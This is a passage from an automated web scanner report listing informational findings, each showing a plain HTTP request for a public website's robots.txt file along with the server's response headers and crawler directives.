X-Pingback: http://www.americanracing.com/xmlrpc.php
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *
Disallow:

27.110. http://www.americansfortruth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americansfortruth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americansfortruth.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:06:54 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://americansfortruth.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 24

User-agent: *
Disallow:

27.111. http://www.americanwhitewater.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanwhitewater.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanwhitewater.org

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "372983248"
Last-Modified: Wed, 14 May 2008 19:30:37 GMT
Content-Length: 66
Connection: close
Date: Wed, 04 May 2011 03:52:06 GMT
Server: pookyserver v1.2

User-agent: *
Disallow: /content/User
Disallow: /content/Journal

27.112. http://www.amex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amex.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:20:09 GMT
Server: Microsoft-IIS/6.0
Content-Length: 113
Content-Type: text/plain
Last-Modified: Fri, 19 Dec 2003 15:34:04 GMT

User-agent: *
Disallow: /asp
Disallow: /indexshares
Disallow: /lib
Disallow: /quote.dll
Disallow: /etfPros

27.113. http://www.ami-admin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ami-admin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ami-admin.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 10 Feb 2010 18:32:07 GMT
ETag: "6090ea-19-47f434068f7c0"
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 00:57:02 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.114. http://www.amolife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amolife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amolife.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Wed, 04 May 2011 03:51:00 GMT
Content-Type: text/plain
Content-Length: 302
Last-Modified: Fri, 01 Oct 2010 12:50:02 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.115. http://www.amplify.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amplify.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amplify.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:59:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 19:36:23 GMT
ETag: "34c9890-33-49f033e225bc0"
Accept-Ranges: bytes
Content-Length: 51
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
Sitemap: /sitemap.xml


27.116. http://www.analog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.analog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.analog.com

Response

HTTP/1.0 200 OK
Content-Length: 317
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 19:34:16 GMT
Accept-Ranges: bytes
ETag: "ae5d7d2cfa42cb1:6b8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:55:17 GMT
Connection: close

User-agent: Yahoo Pipes 1.0
Disallow: /

User-agent: *
Disallow: /en/prod/
Disallow: /en/cat/
Disallow: /en/subCat/
Disallow: /jp/prod/
Disallow: /jp/cat/
Disallow: /jp/subCat/
Disallow: /zh
...[SNIP]...

27.117. http://www.analytic1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.analytic1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.analytic1.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 10 Sep 2010 22:43:35 GMT
ETag: "a3784dc-6a-48fef7a1513c0"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

27.118. http://www.ancientfaces.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ancientfaces.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ancientfaces.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 01 Mar 2011 12:02:19 GMT
ETag: "250ad23-c5-49d6a91722495"
Accept-Ranges: bytes
Content-Length: 197
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /list/
Disallow: /etc/
Disallow: /classes/
Disallow: /cgi-bin/
http://www.ancientfaces.com/web_sitemap_e2f39d0b.xml.gz # Added by Google Sitemap Generator

27.119. http://www.angel-guide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.angel-guide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.angel-guide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:07 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.angel-guide.com/TudSxWds.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Dis
...[SNIP]...

27.120. http://www.antiquecar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.antiquecar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.antiquecar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 20:45:40 GMT
ETag: "143ca08-788-489540b23db00"
Accept-Ranges: bytes
Content-Length: 1928
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Disallow: /*?
Disallow: /subcat5
Disallow: /admin/
Disallow: /adpeeps/
Disallow: /backupdb/
Disallow: /displayIP/
Disallow: /ec_upda
...[SNIP]...

27.121. http://www.anu.edu.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anu.edu.au
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anu.edu.au

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o DAV/2 PHP/5.2.14
Last-Modified: Fri, 02 Oct 2009 00:34:17 GMT
ETag: "27dcde-6d7-474e8ec95667f"
Accept-Ranges: bytes
Content-Length: 1751
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /index/
Disallow: /anuevents/
Disallow: /pub/
Disallow: /usage/
Disallow: /proto/
Disallow: /CNIP/parliament/protected/
Disallow: /cnip/parliament/protected/
Disallow: /web/par
...[SNIP]...

27.122. http://www.anytubes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anytubes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anytubes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:07:35 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Last-Modified: Wed, 30 Mar 2011 10:31:01 GMT
ETag: "1378432-16-49fb0ac52a340"
Accept-Ranges: bytes
Content-Length: 22

User-agent: *
Allow: /

27.123. http://www.apropo.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apropo.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apropo.ro

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:34 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Last-Modified: Wed, 07 Oct 2009 08:12:18 GMT
ETag: "2179136c-17-47553e7c49c80"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.124. http://www.aprovenproduct.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aprovenproduct.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aprovenproduct.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 21 Mar 2011 21:44:53 GMT
ETag: "71ae1-38-49f0509af9f40"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /order/*
Disallow: /promos/bump/

27.125. http://www.aps.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aps.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aps.edu

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 14 Jan 2010 02:26:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 549
Server: AnonymousServer
X-Varnish-Action: FETCH (insert)
Date: Wed, 04 May 2011 01:38:05 GMT
X-Varnish: 1320623004
Age: 0
Via: 1.1 varnish
Connection: close

# Define access-restrictions for robots/spiders
# http://www.robotstxt.org/wc/norobots.html


# By default we allow robots to access all areas of our site
# already accessible to anonymous users

Us
...[SNIP]...

27.126. http://www.aps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aps.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aps.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:58 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 19:23:06 GMT
ETag: "8222a-23c-488c6119609b9"
Accept-Ranges: bytes
Content-Length: 572
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cache
Disallow: /cache.old
Disallow: /customcf
Disallow: /customfields
Disallow: /datasheet-modules
Disallow: /elementadmin
Disallow: /js
Disallow: /lex
Disallow: /me
...[SNIP]...

27.127. http://www.apublicnudity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apublicnudity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apublicnudity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:46:31 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 06 Jan 2009 13:40:22 GMT
ETag: "308c28b-27-45fd08c81dd80"
Accept-Ranges: bytes
Content-Length: 39

User-agent: *
Disallow:
Allow: *


27.128. http://www.aquasana.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aquasana.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aquasana.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:44:49 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 19:36:21 GMT
ETag: "a01806e-6b-491067e431740"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /b/
Sitemap: http://www.aquasana.com/sitemap.xml

27.129. http://www.archimedes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archimedes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.archimedes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:34:42 GMT
Server: Apache
Last-Modified: Sat, 30 Oct 2010 14:13:45 GMT
ETag: "c659-1e0-493d62edb89d6"
Accept-Ranges: bytes
Content-Length: 480
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /cgi-bin/
Disallow: /components/
Disallow: /fmr/comp529.phtml
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
...[SNIP]...

27.130. http://www.areapal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.areapal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.areapal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:08 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 29 Oct 2010 05:14:17 GMT
ETag: "df030f-1b-493ba87b79c40"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /


27.131. http://www.ares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ares.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ares.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Fri, 18 Dec 2009 22:08:58 GMT
ETag: "29cf3d4-60-47b07fc7ed280"
Accept-Ranges: bytes
Content-Length: 96
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

User-Agent: Googlebot
Allow: /

Sitemap: http://www.ares.com/sitemap.xml

27.132. http://www.arlingtonpark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arlingtonpark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arlingtonpark.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 22 Apr 2010 04:54:39 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
cache-control: max-age = 1800
X-Varnish-Cacheable: YES:Cacheable
X-Varnish-TTL: 2592000.000
Content-Length: 1590
Date: Wed, 04 May 2011 00:43:21 GMT
X-Varnish: 1829110581
Via: 1.1 varnish
Connection: close
age: 0
X-Varnish-Cache: MISS

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.133. http://www.arteryhealthinstitute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arteryhealthinstitute.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arteryhealthinstitute.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:39:02 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 12 Dec 2008 19:29:43 GMT
ETag: "4960124-496-45dde83d8f7c0"
Accept-Ranges: bytes
Content-Length: 1174
Connection: close
Content-Type: text/plain

User-agent: BadBot
Disallow: /
user-agent: inktomi
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /images/
Disallow: /styles/
Disallow: /aa/
Disallow: /bb/
Disallow: /cc/
Disallow: /cart/
Disallow: /ca
...[SNIP]...

27.134. http://www.aseadnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aseadnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aseadnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:00 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Thu, 22 Apr 2010 17:03:05 GMT
ETag: "2e482d0-ca-484d648bc2440"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /online.php
Disallow: /helper.php
Disallow: /msg.php
Disallow: /usercp.php
Disallow: /pm.php
Disallow: /log.php
Disallow: /sitecp.php
Disallow: /admincp.php
Disallow: /viewpm.p
...[SNIP]...

27.135. http://www.ashmax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ashmax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ashmax.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Wed, 29 Dec 2010 22:47:37 GMT
ETag: "15e003c-42-498945b0cf440"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /dev/

27.136. http://www.ask-oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask-oracle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ask-oracle.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:13 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 11:33:08 GMT
ETag: "1a45e55-124-48d626180227b"
Accept-Ranges: bytes
Content-Length: 292
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /tos/
Disallow: /advertise-with-us/
Disallow: /return-policy/
Disallow: /contact-us/
Disallow: /answers/?qid=
Disallow: /privacy-statement/
Disallow: /horoscope/yearly-career/*
...[SNIP]...

27.137. http://www.ask666.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask666.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ask666.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:02:56 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.2.13
Last-Modified: Thu, 27 May 2010 21:04:03 GMT
ETag: "b813-19-48799baf1d6c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.138. http://www.astral-blue.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astral-blue.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astral-blue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.3 with Suhosin-Patch
Last-Modified: Mon, 27 Oct 2008 14:11:42 GMT
ETag: "4e5c60-1a-b5d4c380"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

#User-agent: *
#Disallow:

27.139. http://www.astrology-insight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astrology-insight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astrology-insight.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:16 GMT
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_throttle/3.1.2 PHP/5.2.13 FrontPage/5.0.2.2623 mod_ssl/2.8.22 OpenSSL/0.9.7a
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 01:47:16 GMT
Last-Modified: Tue, 08 Nov 2005 04:49:59 GMT
ETag: "afcc2-b7-43702e77"
Accept-Ranges: bytes
Content-Length: 183
Connection: close
Content-Type: text/plain

# robots.txt for http://www.astrology-insight.com/
User-agent: *
Disallow: /cgi-bin/
Disallow: /astrology/
Disallow: /guestbook/
Disallow: /othersites/
User-agent: psbot
Disallow: /

27.140. http://www.at-communication.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.at-communication.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.at-communication.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:15 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 09:08:32 GMT
ETag: "30c06d8-18-48ab465b5c400"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.141. http://www.ataglance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ataglance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ataglance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:10 GMT
Server: Web Server 1.0
Last-Modified: Mon, 07 Mar 2011 22:44:11 GMT
ETag: "7f76f9-1b-49dec3c09a6ae"
Accept-Ranges: bytes
Content-Length: 27
Keep-Alive: timeout=15, max=78
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_nxw_bubhmbodf_qspe_tubujd_mc=ffffffff09c939a445525d5f4f58455e445a4a423660;path=/

User-agent: *
Allow: /


27.142. http://www.atemda.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atemda.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atemda.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 16 Apr 2011 09:06:24 GMT
Accept-Ranges: bytes
ETag: "0e85d8f15fccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="NOI DSP NID BUS UNI PUR COM NAV INT DEM STA PRE LOC OTC CURa ADMa DEVa PSAa PSDa OUR"
Date: Wed, 04 May 2011 03:16:26 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.143. http://www.atlasquest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlasquest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atlasquest.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:56 GMT
Server: Apache
Last-Modified: Sun, 11 Apr 2010 17:37:49 GMT
ETag: "1ea5476-409-4bc208ed"
Accept-Ranges: bytes
Content-Length: 1033
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact.html
Disallow: /admin/
Disallow: /boards/
Disallow: /boxes/actions/
Disallow: /boxes/add/
Disallow: /boxes/clue/
Disallow: /boxes/event/
Disallow: /boxes/postal/
Disal
...[SNIP]...

27.144. http://www.atwiki.jp/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atwiki.jp
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atwiki.jp

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:13 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Mon, 24 Aug 2009 18:59:33 GMT
ETag: "18212ff-27-4a92e315"
Accept-Ranges: bytes
Content-Length: 39
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /click
Allow: /

27.145. http://www.auristechnology.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.auristechnology.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.auristechnology.com

Response

HTTP/1.1 200 OK
Content-Length: 193
Content-Type: text/plain
Last-Modified: Fri, 18 Apr 2003 19:41:34 GMT
Accept-Ranges: bytes
ETag: "f0109484e25c31:73c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:42:32 GMT
Connection: close

User-agent: *

Disallow: /flash
Disallow: /images
Disallow: /includes
Disallow: /customer_service
Disallow: /gfx
Disallow: /new_site
Disallow: /js
Disallow: /officeuse
Disallow: /test

27.146. http://www.authpro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.authpro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.authpro.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:51 GMT
Server: Apache/1.3.41 (Unix) mod_fastcgi/2.2.12 mod_ssl/2.8.31 OpenSSL/0.9.8l
Last-Modified: Tue, 16 Jan 2007 08:03:41 GMT
ETag: "63e813d-2f-45ac86dd"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/manager.fcgi


27.147. http://www.autocreditexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocreditexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autocreditexpress.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 30 Mar 2010 21:05:18 GMT
ETag: "98c049-170-4830afc9e7f80"
Accept-Ranges: bytes
Content-Length: 368
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# Allow Googlebot
User-Agent: Googlebot
Disallow: /blog_old/

# Allow MSN Bot
User-Agent: msnbot
Disallow:

# Allow Yahoo
User-Agent: Slurp
Disallow:

#Allow Teoma
User-Agent: Teoma
Disallow:

# linkw
...[SNIP]...

27.148. http://www.autodealerspoint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autodealerspoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autodealerspoint.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:51:36 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Last-Modified: Mon, 08 Sep 2008 13:53:22 GMT
ETag: "6c0017-43-be0ab880"
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /demo1
Disallow: /hbpanel/
Disallow: /abm/

27.149. http://www.autoinsurance.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autoinsurance.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autoinsurance.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:34 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 14:08:45 GMT
ETag: "e809e-7d-490c591263540"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /autoform/
Disallow: /autoinsurancequotes.php
Sitemap: http://www.autoinsurance.net/sitemapxml.php

